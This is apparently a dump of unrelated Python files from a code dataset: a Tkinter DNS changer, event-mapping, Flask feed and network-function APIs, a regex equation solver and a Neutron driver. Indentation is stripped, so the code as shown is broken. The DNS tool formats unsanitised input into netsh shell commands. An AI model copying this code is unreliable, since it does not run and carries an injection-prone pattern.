self.provider_combobox['values'] = list(self.dns.keys())
self.provider_combobox.set("Choose a provider")
self.primary_address_var.set("")
self.secondary_address_var.set("")
else:
msg.showerror("Wrong choice", "Choose a correct provider.")
# edit and save dns addresses
def Edit_and_Save(self, edit:bool):
dns1 = self.primary_address_entry.get()
dns2 = self.secondary_address_entry.get()
if edit:
if len(self.dns) == 0:
msg.showwarning("No provider", "at first, build a DNS profile with add button then you can choose it to edit.")
elif not self.provider_combobox.get() == "Choose a provider":
self.provider_combobox['state'] = 'disabled'
self.delete_btn['state'] = 'disabled'
self.set_btn['state'] = 'disabled'
self.add_btn['state'] = 'disabled'
self.primary_address_entry['state'] = 'normal'
self.secondary_address_entry['state'] = 'normal'
self.edit_btn.config(text = 'Save', image = self.save_icon, command = lambda: self.Edit_and_Save(edit = False))
else:
msg.showwarning('Wrong choice', 'first choose a provider for editing.')
else:
if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns1):
if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns2) or dns2 == "":
pass
else:
msg.showerror("Error", "Correct secondary address and try again.")
return False
self.provider_combobox['state'] = 'readonly'
self.delete_btn['state'] = 'normal'
self.set_btn['state'] = 'normal'
self.add_btn['state'] = 'normal'
self.primary_address_entry['state'] = 'disabled'
self.secondary_address_entry['state'] = 'disabled'
self.dns.update({self.provider_combobox.get():{
"Primary Address": str(dns1),
"Secondary Address": str(dns2)}})
self.Write_on_DNS()
self.edit_btn.config(text = 'Edit', image = self.edit_icon, command = lambda: self.Edit_and_Save(edit = True))
else:
msg.showerror("Error", "Correct primary address and try again.")
return False
# set dns to connection
def Execute(self):
dns1 = self.primary_address_var.get()
dns2 = self.secondary_address_entry.get()
adaptor = self.connections_combobox.get()
if dns1 != "":
try:
os.system(f"netsh interface ip set dns {adaptor} static address={dns1}")
if dns2 != "":
os.system(f"netsh interface ip add dns {adaptor} addr={dns2} index=2")
except Exception as e:
msg.showerror("Error", e)
else:
if not self.is_admin:
msg.showwarning("Admin privileges", "The requested operation requires elevation (Run as administrator).")
else:
self.Get_DNS()
msg.showinfo("Done", f"The DNS has been changed to {self.provider_combobox.get()}")
else:
msg.showerror("Error", "Choose a valid provider or check DNS addresses.")
# reset dns to default
def Reset(self):
try:
if self.is_admin:
subprocess.Popen(f"netsh interface ip set dns {self.connections_combobox.get()} dhcp")
msg.showinfo("Done", "The DNS provider has been reset to default")
else:
msg.showwarning("Admin privileges", "The requested operation requires elevation (Run as administrator).")
return False
except Exception as e:
msg.showerror("Error", e)
else:
self.Get_DNS()
# check ip details
def Check_ip(self):
try:
url = 'http://ipinfo.io/json'
response = urlopen(url)
data = json.load(response)
self.ip.config(text = data['ip'], fg = 'green')
self.country.config(text = data['country'], fg = 'green')
self.region.config(text = data['region'], fg = 'green')
self.city.config(text = data['city'], fg = 'green')
except Exception as e:
self.ip.config(fg = 'red', text = 'N/A')
self.country.config(fg = 'red', text = 'N/A')
self.region.config(fg = 'red', text = 'N/A')
self.city.config(fg = 'red', text = 'N/A')
msg.showerror("Error", e)
# get dns of connection
def Get_DNS(self):
try:
adaptor = self.connections_combobox.get()
config = subprocess.check_output(f'netsh interface ipv4 show config name={adaptor}', stdin = subprocess.PIPE, stderr = subprocess.STDOUT).decode()
config_list = re.sub(' +', ' ',re.search('Statically Configured DNS Servers:', config).string).split("\n")
primary_dns = False
for i in config_list:
if primary_dns:
try:
dns2 = re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', i).group()
self.dns2.config(text = dns2, fg = 'green')
break
except AttributeError:
self.dns2.config(text = 'N/A', fg = 'red')
break
if i.startswith(" Statically"):
primary_dns = True
dns1 = re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', i).group()
self.dns1.config(text = dns1, fg = 'green')
except AttributeError:
self.dns1.config(text = 'N/A', fg = 'red')
self.dns2.config(text = 'N/A', fg = 'red')
# Refresh dns status and ip details
def Refresh(self):
self.Get_DNS()
self.Check_ip()
def main():
root = Tk()
root.title("DNS Changer")
root.iconbitmap('Icons/dns.ico')
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
x = (screen_width/2) - (400/2)
y = (screen_height/2) - (400/2)
root.geometry('400x440+%d+%d' % (x, y))
root.resizable(False, False)
connections = list((psutil.net_if_addrs()).keys())
try:
DNSs = json.load(open("DNS Addresses.json", "r"))
except FileNotFoundError:
with open("DNS Addresses.json", 'w') as file:
file.write(json.dumps({
"Google":{ # Provider
"Primary Address": "8.8.8.8", # First DNS address
"Secondary Address": "8.8.4.4" # Second DNS address
}
}, indent=4))
except json.JSONDecodeError as e:
msg.showerror("json decoding error", e)
finally:
DNSs = json.load(open("DNS Addresses.json", "r"))
app = Application(root, DNSs, connections)
root.mainloop()
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
9618304
|
<gh_stars>0
def count():
import url
while True:
print(url.url)
|
StarcoderdataPython
|
179112
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from atvgnet import *
|
StarcoderdataPython
|
249012
|
<filename>threatmatrix/processing.py<gh_stars>0
import csv
import sqlalchemy
import folium
import pandas as pd
import cgi
import re
from pathlib import Path
from bokeh.models.widgets import RangeSlider, Button, DataTable, \
TableColumn, NumberFormatter
from bokeh.models import ColumnDataSource, Whisker
from bokeh.plotting import figure, show
from bokeh.layouts import row, widgetbox
from branca.colormap import LinearColormap
from threatmatrix.db import db_location
def get_data(n):
engine = sqlalchemy.create_engine(db_location)
conn = engine.connect()
df = pd.read_sql('events', conn)[:n]
df['notes'] = df['notes'].map(clean_note)
return df
def clean_note(note):
note = note.replace("'", "").replace('"', '')
if len(note) > 100:
parts = []
for i in range(0, len(note.split()), 10):
parts.append(' '.join(note.split()[i:i+10]))
note = '<br>'.join(parts)
return note
def create_map(df, map_type):
if map_type == 'choropleth':
create_choropleth(df, columns=['country', 'fatalities'])
elif map_type == 'points':
create_points(df)
def create_points(df):
m = folium.Map(location=[35, 55], zoom_start=5, tiles='Stamen Terrain')
icons = {
'Default': 'info-sign',
'Riots/Protests': 'user',
'Battle-No change of territory': 'flash',
'Violence against civilians': 'pawn',
'Strategic development': 'globe',
'Remote violence': 'plane',
'Battle-Government regains territory': 'king',
'Battle-Non-state actor overtakes territory': 'queen',
'Non-violent transfer of territory': 'transfer',
'Headquarters or base established': 'tower'
}
points = df[['latitude', 'longitude', 'notes',
'event_type']].values.tolist()
for i in range(len(points)):
folium.Marker([float(points[i][0]),
float(points[i][1])],
tooltip=points[i][2],
icon=folium.Icon(icon=icons[points[i][3]])).add_to(m)
m.save(str(Path(__file__).parent.joinpath('maps/points.html')))
def get_color(feature, map_dict, columns, color_scale):
value = map_dict.get(feature['properties']["ADMIN"])
if value is None:
return '#8c8c8c' # MISSING -> gray
else:
return color_scale(value)
def create_choropleth(df, columns):
df[columns[1]] = pd.to_numeric(df[columns[1]], downcast='integer').fillna(0)
df = df.groupby(columns[0]).sum()[columns[1]].to_frame().reset_index()
map_dict = df.set_index(columns[0])[columns[1]].to_dict()
country_geo = str(Path(__file__).parent\
.joinpath('assets/countries.geojson'))
color_scale = LinearColormap(['yellow','red'], vmin=min(map_dict.values()),
vmax=max(map_dict.values()))
m = folium.Map(location=[0, 0], zoom_start=3)
folium.GeoJson(
data = country_geo,
style_function = lambda feature: {
'fillColor': get_color(feature, map_dict, columns, color_scale),
'fillOpacity': 0.7,
'color' : 'black',
'weight' : 1,
}
).add_to(m)
m.save(str(Path(__file__).parent.joinpath('maps/choropleth.html')))
def create_bar_chart(df):
df['fatalities'] = pd.to_numeric(df['fatalities'])
df['fatalities'] = df['fatalities'].fillna(0)
sums = df.groupby('iso3')['fatalities'].sum().sort_values()
sums = sums[sums > 0]
countries = sums.index.values
counts = sums.values
p = figure(x_range=countries, plot_height=250,
title="Fatalities by Country")
p.vbar(x=countries, top=counts, width=0.5)
p.y_range.start = 0
p.xgrid.grid_line_color = None
return p
def create_table(df):
source = ColumnDataSource(data=dict())
current = df.sort_values('fatalities', ascending=False).head(10)
source.data = {
'Country' : current.country,
'Date' : current.event_date,
'Fatalities' : current.fatalities,
'Description' : current.notes,
}
columns = [
TableColumn(field="Country", title="Country"),
TableColumn(field="Date", title="Date"),
TableColumn(field="Fatalities", title="Fatalities"),
TableColumn(field="Description", title="Description")
]
data_table = DataTable(source=source, columns=columns, width=800)
table = widgetbox(data_table)
return table
|
StarcoderdataPython
|
11215533
|
'''
Created on Mar 31, 2015
@author: <NAME> <<EMAIL>>
'''
from __future__ import division
import numpy as np
from scipy import optimize
from .lib_bin_base import LibraryBinaryBase
LN2 = np.log(2)
class LibraryBinaryUniform(LibraryBinaryBase):
""" represents a single receptor library with random entries. The only
parameters that characterizes this library is the density of entries. """
def __init__(self, num_substrates, num_receptors, density=1,
parameters=None):
""" initialize the receptor library by setting the number of receptors,
the number of substrates it can respond to, and the fraction `density`
of substrates a single receptor responds to """
super(LibraryBinaryUniform, self).__init__(num_substrates,
num_receptors, parameters)
self.density = density
@property
def repr_params(self):
""" return the important parameters that are shown in __repr__ """
params = super(LibraryBinaryUniform, self).repr_params
params.append('xi=%g' % self.density)
return params
@property
def init_arguments(self):
""" return the parameters of the model that can be used to reconstruct
it by calling the __init__ method with these arguments """
args = super(LibraryBinaryUniform, self).init_arguments
args['density'] = self.density
return args
@classmethod
def get_random_arguments(cls, **kwargs):
""" create random arguments for creating test instances """
args = super(LibraryBinaryUniform, cls).get_random_arguments(**kwargs)
args['density'] = kwargs.get('density', np.random.random())
return args
def receptor_activity(self, ret_correlations=False, approx_prob=False,
clip=True):
""" return the probability with which a single receptor is activated
by typical mixtures """
q_n, q_nm = self.receptor_crosstalk(ret_receptor_activity=True,
approx_prob=approx_prob)
r_n = q_n
r_nm = q_n**2 + q_nm
if clip:
r_n = np.clip(r_n, 0, 1)
r_nm = np.clip(r_nm, 0, 1)
if ret_correlations:
return r_n, r_nm
else:
return r_n
def receptor_crosstalk(self, ret_receptor_activity=False, approx_prob=False):
""" calculates the average activity of the receptor as a response to
single ligands. """
p_i = self.substrate_probabilities
# get probability q_n and q_nm that receptors are activated
if approx_prob:
# use approximate formulas for calculating the probabilities
q_n = self.density * p_i.sum()
q_nm = self.density**2 * p_i.sum()
# clip the result to [0, 1]
q_n = np.clip(q_n, 0, 1)
q_nm = np.clip(q_nm, 0, 1)
else:
# use better formulas for calculating the probabilities
xi = self.density
q_n = 1 - np.prod(1 - xi * p_i)
q_nm = np.prod(1 - (2*xi - xi**2) * p_i) - np.prod(1 - xi * p_i)**2
if ret_receptor_activity:
return q_n, q_nm
else:
return q_nm
def mutual_information(self, approx_prob=False,
excitation_method='logarithm',
mutual_information_method='default',
clip=True):
""" return a theoretical estimate of the mutual information between
input and output.
`excitation_method` determines which method is used to approximate
the mutual information. Possible values are `logarithm`, and
`overlap`, in increasing order of accuracy.
`approx_prob` determines whether a linear approximation should be
used to calculate the probabilities that receptors are active
"""
if excitation_method =='logarithm':
# use the expansion of the mutual information around the optimal
# point to calculate an approximation of the mutual information
# determine the probabilities of receptor activations
q_n, q_nm = self.receptor_crosstalk(ret_receptor_activity=True,
approx_prob=approx_prob)
# calculate mutual information from this
MI = self._estimate_MI_from_q_stats(
q_n, q_nm, method=mutual_information_method)
elif excitation_method == 'overlap':
# calculate the MI assuming that receptors are independent.
# This expression assumes that each receptor provides a fractional
# information H_r/N_s. Some of the information will be overlapping
# and the resulting MI is thus smaller than the naive estimate:
# MI < N_r * H_r
# determine the probabilities of receptor activation
q_n = self.receptor_activity(approx_prob=approx_prob)
# calculate mutual information from this, ignoring crosstalk
MI = self._estimate_MI_from_q_stats(
q_n, 0, method=mutual_information_method)
# estimate the effect of crosstalk by calculating the expected
# overlap between independent receptors
H_r = MI / self.Nr
MI = self.Ns - self.Ns*(1 - H_r/self.Ns)**self.Nr
else:
raise ValueError('Unknown method `%s`' % excitation_method)
if clip:
# limit the MI to the mixture entropy
return np.clip(MI, 0, self.mixture_entropy())
else:
return MI
def density_optimal(self, approx=True, **kwargs):
""" return the estimated optimal activity fraction for the simple case
where all h are the same. The estimate relies on an approximation that
all receptors are independent and is thus independent of the number of
receptors. The estimate is thus only good in the limit of low Nr.
"""
# approximate using mean substrate size
m = self.substrate_probabilities.sum()
density_opt = min(0.5 / m, 1)
if approx:
return density_opt
# solve a numerical equation
obj = self.copy()
def reduction(density):
""" helper function that evaluates the mutual information """
obj.density = density
return -obj.mutual_information(**kwargs)
res = optimize.minimize(reduction, density_opt, bounds=[(0, 1)])
if res.success:
return res.x[0]
else:
raise RuntimeError(res)
def get_optimal_library(self):
""" returns an estimate for the optimal parameters for the random
interaction matrices """
return {'density': self.density_optimal(assume_homogeneous=True)}
|
StarcoderdataPython
|
1895094
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ProvisioningState(str, Enum):
creating = "Creating"
failed = "Failed"
succeeded = "Succeeded"
canceled = "Canceled"
class ComputeRole(str, Enum):
none = "None"
iaa_s = "IaaS"
paa_s = "PaaS"
class OperatingSystem(str, Enum):
none = "None"
windows = "Windows"
linux = "Linux"
class CompatibilityIssue(str, Enum):
higher_device_version_required = "HigherDeviceVersionRequired"
lower_device_version_required = "LowerDeviceVersionRequired"
capacity_billing_model_required = "CapacityBillingModelRequired"
pay_as_you_go_billing_model_required = "PayAsYouGoBillingModelRequired"
development_billing_model_required = "DevelopmentBillingModelRequired"
azure_ad_identity_system_required = "AzureADIdentitySystemRequired"
adfs_identity_system_required = "ADFSIdentitySystemRequired"
connection_to_internet_required = "ConnectionToInternetRequired"
connection_to_azure_required = "ConnectionToAzureRequired"
disconnected_environment_required = "DisconnectedEnvironmentRequired"
class Category(str, Enum):
azure_ad = "AzureAD"
adfs = "ADFS"
class Location(str, Enum):
global_enum = "global"
|
StarcoderdataPython
|
1742787
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = ["api"]
import flask
import feedfinder2
from functools import wraps
from flask.ext.login import current_user
from .database import db
from .models import User, Feed
api = flask.Blueprint("api", __name__)
def _get_user():
token = flask.request.values.get("token")
if token is not None:
return User.query.filter_by(api_token=token).first()
return current_user
def private_view(func):
@wraps(func)
def decorated_view(*args, **kwargs):
user = _get_user()
# Check for invalid API tokens.
if user is None:
return flask.jsonify(message="Invalid API token."), 403
# Check to make sure that the current user is valid.
if not user.is_authenticated():
return flask.abort(404)
return func(*args, **kwargs)
return decorated_view
@api.route("/")
def index():
return flask.render_template("api.html")
@api.route("/new")
def new_key():
if not current_user.is_authenticated():
return flask.abort(404)
current_user.api_token = current_user.generate_token()
db.session.commit()
return flask.redirect(flask.url_for(".index"))
@api.route("/feeds")
@private_view
def feeds():
feeds = _get_user().feeds
return flask.jsonify(
count=len(feeds),
feeds=[feed.to_dict() for feed in feeds],
)
@api.route("/feed/<int:feedid>", methods=["GET"])
@private_view
def feed_info(feedid):
user = _get_user()
# Find the feed.
feed = db.session.query(Feed).join(User.feeds) \
.filter(User.id == user.id) \
.filter(Feed.id == feedid).first()
# If the user isn't subscribed, return a failure.
if feed is None:
return flask.jsonify(message="Invalid feed ID."), 400
return flask.jsonify(**(feed.to_dict()))
@api.route("/subscribe", methods=["GET", "POST"])
@private_view
def subscribe():
# Get the requested subscription URL.
add_url = flask.request.values.get("url")
if add_url is None:
return flask.jsonify(message="You must provide a URL."), 400
# Check to make sure that the user doesn't have too many subscriptions.
user = _get_user()
mx = flask.current_app.config.get("MAX_FEEDS", -1)
if mx > 0 and len(user.feeds) >= mx:
return flask.jsonify(message="You're already subscribed to the "
"maximum number of feeds."), 400
# Try to find a feed below the requested resource.
urls = feedfinder2.find_feeds(add_url)
if not len(urls):
return flask.jsonify(message="The robot can't find a feed at that "
"URL. Could you help it with a more specific "
"link?"), 400
url = urls[0]
# See if the user is already subscribed to a feed at that URL.
feed = db.session.query(Feed).join(User.feeds) \
.filter(User.id == user.id) \
.filter(Feed.url == url).first()
if feed is not None:
return flask.jsonify(
message="You've already subscribed to {0}.".format(feed.title),
feed=feed.to_dict(),
)
# See if a feed object already exists for that URL.
feed = Feed.query.filter(Feed.url == url).first()
# If it doesn't, create a new one.
if feed is None:
feed = Feed(url)
# Update the feed immediately to get the title, etc.
feed.update_info()
# Subscribe the current user.
user.feeds.append(feed)
db.session.commit()
return flask.jsonify(
message="Successfully subscribed to {0}.".format(feed.title),
feed=feed.to_dict(),
)
@api.route("/feed/<int:feedid>", methods=["DELETE"])
@private_view
def unsubscribe(feedid):
user = _get_user()
# Find the feed that the user wants to unsubscribe from.
feed = db.session.query(Feed).join(User.feeds) \
.filter(User.id == user.id) \
.filter(Feed.id == feedid).first()
# If the user isn't subscribed, return a failure.
if feed is None:
return flask.jsonify(message="Invalid feed ID."), 400
# Unsubscribe the user.
title = feed.title
user.feeds.remove(feed)
db.session.commit()
return flask.jsonify(message="Successfully unsubscribed from {0}."
.format(title))
|
StarcoderdataPython
|
6431547
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
import nlpregex.abs_graph.double_link
import nlpregex.abs_graph.node
import nlpregex.abs_graph.edge
import nlpregex.abs_graph.graph
import nlpregex.regular_language.sse_forrest
# @brief represents one symbolic equation that consists of LHS = RHS.
# LHS is a variable (state)
# RHS is a set of terms
# a term consists of pair of variable and its coefficent.
# a coefficient is an AST
class SymbolicEquation():
def __init__( self, lhs, forrest ):
self.lhs = lhs # state
self.rhs = {} # k: state, v: coeff (top node of AST )
self.forrest = forrest # sseAST
# @brief adding coefficienct to the RHS
#
# @param j : column number
# @param symbols : list of terminals i.e., list of strings that represent numbers.
# e.g. 't0', 't1', ... 't999999'
# if there is only one terminal specified, the resultant AST is the terminal.
# if there are multiple terminals, then the resultant AST represents a selection
# whose children are the terminals.
# if there is a coefficient already present, then the symbols are added under
# the existing selection.
def add_coeff( self, j, param_symbols ):
if j not in self.rhs:
r = self.forrest.create_initial_union_node( param_symbols )
self.rhs[j] = r
else:
t1 = self.rhs[j] # Assume it is a term or a union
t2 = self.forrest.create_initial_union_node( param_symbols )
self.rhs[j] = self.forrest.union_two_ASTs( t1, t2 )
# @brief remove the self recursion from RHS using Arden's rule s1 = Ls1 | Rs2 |Ts3 => s1 = L*Rs2 | L*Ts3
def remove_self_recursion(self):
if self.lhs in self.rhs:
if self.rhs[self.lhs].ast_node_type == 'e':
self.remove_term( self.lhs )
else:
L_clone = self.forrest.clone_AST( self.rhs[self.lhs] )
L_star = self.forrest.repeat_AST( L_clone )
for s in self.rhs:
if s != self.lhs:
L_star_clone = self.forrest.clone_AST(L_star)
self.rhs[s] = self.forrest.concat_two_ASTs( L_star_clone, self.rhs[s] )
self.remove_term( self.lhs )
self.forrest.remove_AST(L_star)
# @brief prepend copy of L (AST) to each in RHS
# @param L : root node of AST
def prepend_coeff(self, L):
if L.ast_node_type != 'e':
for state in self.rhs:
L_clone = self.forrest.clone_AST(L)
self.rhs[state] = self.forrest.concat_two_ASTs( L_clone, self.rhs[state] )
# @brief merge the RHS of the specified equation into this RHS as part of row elimination
# @param eq2 : the equation (SymbolidEquation) whose RHS are merged into.
# eq2 is completely consumed by this function, meaning the caller do not have to
# remove the residual coefficients in RHS.
def merge_into( self, eq2 ):
eq2_vars = list(eq2.rhs.keys())
for s2 in eq2_vars:
if s2 in self.rhs:
t1 = self.rhs[s2]
t2 = eq2. rhs[s2]
merged_term = self.forrest.union_two_ASTs( t1, t2 )
self.rhs[s2] = merged_term
else:
self.rhs[s2] = eq2.rhs[s2]
del eq2.rhs[s2]
# remove remaining terms in eq2
eq2.clean_RHS()
# @brief make a clone of this equation.
def clone( self ):
eq_copy = SymbolicEquation( self.lhs, self.forrest )
for k in self.rhs:
eq_copy.rhs[k] = self.forrest.clone_AST( self.rhs[k] )
return eq_copy
# @brief clean up RHS (ASTs)
def clean_RHS(self):
keys = list(self.rhs.keys())
for k in keys:
self.remove_term( k )
# @brief remove the specified term from the RHS.
def remove_term( self, i ):
self.forrest.remove_AST( self.rhs[ i ] )
del self.rhs[ i ]
def diag_str(self):
out_str = ""
out_str += "S"
out_str += '{:02d}'.format(self.lhs)
out_str += " =\t"
sorted_keys = sorted( list( self.rhs.keys() ) )
first = True
for k in sorted_keys:
if first:
first = False
else:
out_str += " | "
out_str += self.rhs[k].regex
out_str += " S"
out_str += '{:02d}'.format(k)
return out_str
#
# @brief solve a set of simultaneous symbolic equations to transform
# a finite automaton to an abstract syntax tree.
# the variables are identified by an integer.
# the coeffiients for the variables are represented
# by regular expressions in sseASForrest.
# this solver uses the following types of nodes.
# - selection/union f 'u'
# - sequence/concatenation 's'
# - repetition '*'
# - epsilon 'e'
# - alphabet (terminal) 't1'--'t9999999' (positive number in string)
#
# Each equation has the following form.
# V0 = C1 V1 | C2 V2 | ... | Cx Vx
# V0 : variable on LHS
# Ci : coefficient for variable Vi on RHS
#
class SymbolicSimultaneousEquations():
# @param diag : if True, it generates diagnostics/debug info to console
def __init__(self, diag = False):
self.rows = {} # k: state, v: equation
self.start_state = -1
self.final_state = -1
self.forrest = nlpregex.regular_language.sse_forrest.sseASForrest()
self.diag = diag
# @brief adding coefficienct on the RHS of the specified equation
#
# @param i : row/equation number.
# @param j : column number
# @param symbols : list of terminals i.e., list of strings that represent numbers.
# e.g. 't0', 't1', ... 't999999'
# if there is only one terminal specified, the resultant AST is the terminal.
# if there are multiple terminals, then the resultant AST represents a selection
# whose children are the terminals.
# if there is a coefficient already present, then the symbols are added under
# the existing selection.
def add_coeff( self, i, j, symbols ):
if i not in self.rows:
self.rows[i] = SymbolicEquation( i, self.forrest )
if j not in self.rows:
self.rows[j] = SymbolicEquation( j, self.forrest )
self.rows[i].add_coeff( j, symbols )
# @brief solve the equations into an AST
#
# @param s : start variable in integer
# @param F : list of final variables in integer
#
# @return an AST in sseAST.
def solve( self, s, F):
# s : start state
# F : set of final states
# returns the single resultant regex.
self.start_state = self.max_index() + 1
self.rows[ self.start_state ] = SymbolicEquation( self.start_state, self.forrest )
self.add_coeff( self.start_state, s, ['e'] )
self.final_state = self.start_state + 1
for f in F:
self.add_coeff( f, self.final_state, ['e'] )
if self.diag:
print ("Initial State:")
print (self.diag_str())
while len(self.rows) > 2:
if self.diag:
print ( "Beginning of outer loop num rows: " + str(len(self.rows)) )
keys = list(self.rows.keys())
for i in keys:
if i != self.start_state and i != self.final_state :
self.eliminate_row( i )
# At this point only two rows for self.start_state and self.final_state exist.
# The row for start state has only one coefficient for self.final_state
# The row for final state has been always empty.
final_coeff = self.rows[ self.start_state ].rhs[ self.final_state ]
self.forrest.remove_epsilons_from_unions( final_coeff )
self.forrest.create_tree_root_for_reduction( final_coeff )
return self.forrest
# @brief remove this row from the equations.
# this is similar to gaussuan elimination.
def eliminate_row( self, i ):
if self.diag:
print ("Eliminate row " + str(i))
print (self.diag_str())
self.rows[i].remove_self_recursion()
if self.diag:
print ("After self-recursion")
print (self.diag_str())
for j in self.rows:
if i != j:
self.substitute(i, j)
# remove all the ASTs from the row[i] and then remove the row itself.
self.rows[i].clean_RHS()
del self.rows[i]
if self.diag:
print ("After row-elimination of " + str(i))
print (self.diag_str())
# @brief substitute the term i in row j with row i.
def substitute( self, i, j ):
if self.diag:
print ("Substitute " + str(i) + " into " + str(j) )
row_j = self.rows[j]
if i in row_j.rhs:
row_i_copy = self.rows[i].clone()
coeff_ji = row_j.rhs[i]
row_i_copy.prepend_coeff( coeff_ji )
row_j.merge_into( row_i_copy )
row_j.remove_term( i )
if self.diag:
print ("After substitution")
print (self.rows[j].diag_str())
def max_index( self ):
max_row = 0
for i in self.rows:
max_row = max(i,max_row)
return max_row
def diag_str(self):
out_str = ""
out_str += 'Start: S{:02d}'.format(self.start_state)
out_str += "\n"
out_str += 'Final: S{:02d}'.format(self.final_state)
out_str += "\n"
for i in self.rows:
row = self.rows[i]
out_str += row.diag_str()
out_str += "\n"
return out_str
|
StarcoderdataPython
|
5101573
|
<reponame>medianetlab/katana-slice_manager<filename>katana-nbi/katana/api/function.py
# -*- coding: utf-8 -*-
import logging
from logging import handlers
import time
import uuid
from bson.json_util import dumps
from flask import request
from flask_classful import FlaskView
import pymongo
from katana.shared_utils.mongoUtils import mongoUtils
# Logging Parameters
logger = logging.getLogger(__name__)
file_handler = handlers.RotatingFileHandler("katana.log", maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
stream_formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
class FunctionView(FlaskView):
route_prefix = "/api/"
req_fields = ["id", "gen", "func", "shared", "type", "location"]
def index(self):
"""
Returns a list of supported functions and their details,
used by: `katana function ls`
"""
data = mongoUtils.index("func")
return_data = []
for iserv in data:
return_data.append(
dict(
_id=iserv["_id"],
gen=(lambda x: "4G" if x == 4 else "5G")(iserv["gen"]),
func=(lambda x: "Core" if x == 0 else "Radio")(iserv["func"]),
type=(lambda x: "Virtual" if x == 0 else "Physical")(iserv["type"]),
func_id=iserv["id"],
loc=iserv["location"],
created_at=iserv["created_at"],
)
)
return dumps(return_data), 200
def get(self, uuid):
"""
Returns the details of specific function,
used by: `katana function inspect [uuid]`
"""
return dumps(mongoUtils.get("func", uuid)), 200
def post(self):
"""
Add a new supported function.
The request must provide the network function details.
used by: `katana func add -f [yaml file]`
"""
new_uuid = str(uuid.uuid4())
data = request.json
data["_id"] = new_uuid
data["created_at"] = time.time() # unix epoch
data["tenants"] = []
data["shared"]["sharing_list"] = {}
for field in self.req_fields:
try:
_ = data[field]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
try:
new_uuid = mongoUtils.add("func", data)
except pymongo.errors.DuplicateKeyError:
return f"Network Function with id {data['id']} already exists", 400
return f"Created {new_uuid}", 201
def delete(self, uuid):
"""
Delete a specific network function.
used by: `katana function rm [uuid]`
"""
result = mongoUtils.get("func", uuid)
if result:
if len(result["tenants"]) > 0:
return f"Error: Function is used by slices {result['tenants']}"
mongoUtils.delete("func", uuid)
return "Deleted Network Function {}".format(uuid), 200
else:
# if uuid is not found, return error
return "Error: No such Network Function: {}".format(uuid), 404
def put(self, uuid):
"""
Add or update a new supported network function.
The request must provide the service details.
used by: `katana function update -f [yaml file]`
"""
data = request.json
data["_id"] = uuid
old_data = mongoUtils.get("func", uuid)
if old_data:
data["created_at"] = old_data["created_at"]
data["tenants"] = []
data["shared"]["sharing_list"] = {}
if len(old_data["tenants"]) > 0:
return f"Error: Func is used by slices {old_data['tenants']}"
mongoUtils.update("func", uuid, data)
return f"Modified {uuid}", 200
else:
new_uuid = uuid
data = request.json
data["_id"] = new_uuid
data["created_at"] = time.time() # unix epoch
data["tenants"] = []
data["shared"]["sharing_list"] = {}
for field in self.req_fields:
try:
_ = data[field]
except KeyError:
return f"Error: Required fields: {self.req_fields}", 400
try:
new_uuid = mongoUtils.add("func", data)
except pymongo.errors.DuplicateKeyError:
return f"Function with id {data['id']} already exists", 400
return f"Created {new_uuid}", 201
|
StarcoderdataPython
|
5148037
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: <NAME>
# @author: <NAME>
from neutron.openstack.common import uuidutils
from neutron.plugins.nec.common import ofc_client
from neutron.plugins.nec.db import api as ndb
from neutron.plugins.nec import ofc_driver_base
class TremaDriverBase(ofc_driver_base.OFCDriverBase):
"""Common class for Trema (Sliceable Switch) Drivers."""
networks_path = "/networks"
network_path = "/networks/%s"
def __init__(self, conf_ofc):
# Trema sliceable REST API does not support HTTPS
self.client = ofc_client.OFCClient(host=conf_ofc.host,
port=conf_ofc.port)
def _get_network_id(self, ofc_network_id):
# ofc_network_id : /networks/<network-id>
return ofc_network_id.split('/')[2]
def _get_tenant_id(self, tenant_id):
# Trema does not use tenant_id, but it returns
# /tenants/<tenant_id> format to keep consistency with PFC driver.
return '/tenants/' + tenant_id
def create_tenant(self, description, tenant_id=None):
return self._get_tenant_id(tenant_id or uuidutils.generate_uuid())
def update_tenant(self, ofc_tenant_id, description):
pass
def delete_tenant(self, ofc_tenant_id):
pass
def create_network(self, ofc_tenant_id, description, network_id=None):
ofc_network_id = network_id or uuidutils.generate_uuid()
body = {'id': ofc_network_id, 'description': description}
self.client.post(self.networks_path, body=body)
return self.network_path % ofc_network_id
def delete_network(self, ofc_network_id):
return self.client.delete(ofc_network_id)
def convert_ofc_tenant_id(self, context, ofc_tenant_id):
# If ofc_network_id starts with '/', it is already new-style
if ofc_tenant_id[0] == '/':
return ofc_tenant_id
return self._get_tenant_id(ofc_tenant_id)
def convert_ofc_network_id(self, context, ofc_network_id, tenant_id):
# If ofc_network_id starts with '/', it is already new-style
if ofc_network_id[0] == '/':
return ofc_network_id
# Trema sliceable switch does not use tenant_id,
# so we can convert ofc_network_id from old id only
return self.network_path % ofc_network_id
class TremaFilterDriver(object):
